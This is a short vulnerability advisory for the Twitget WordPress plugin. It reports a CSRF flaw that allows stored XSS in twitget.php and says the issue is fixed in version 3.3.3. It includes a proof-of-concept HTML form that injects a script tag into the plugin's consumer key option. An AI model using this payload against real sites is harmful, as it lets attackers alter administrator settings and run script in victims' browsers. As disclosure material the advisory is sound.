CVSS Summary
Score | 6.4 Medium |
Vector | Network |
Complexity | Low |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | None |
Last revised:
If a logged-in administrator visits a specially crafted page, options can be updated (CSRF) without their consent, and some of those options are output unescaped into the form (XSS). In this example the XSS occurs at line 755 in twitget.php. The nonce-checking should have occurred somewhere around line 661 in the same file.
Current state: Fixed
Score | 6.4 Medium |
Vector | Network |
Complexity | Low |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | None |
<form action="http://localhost/wp-admin/options-general.php?page=twitget/twitget.php" method="POST"> <input type="text" name="twitget_username" value="john_smith"> <input type="text" name="twitget_consumer_key" value=""><script>alert('dxw')</script>"> <input type="submit"> </form>
Upgrade to version 3.3.3 or later.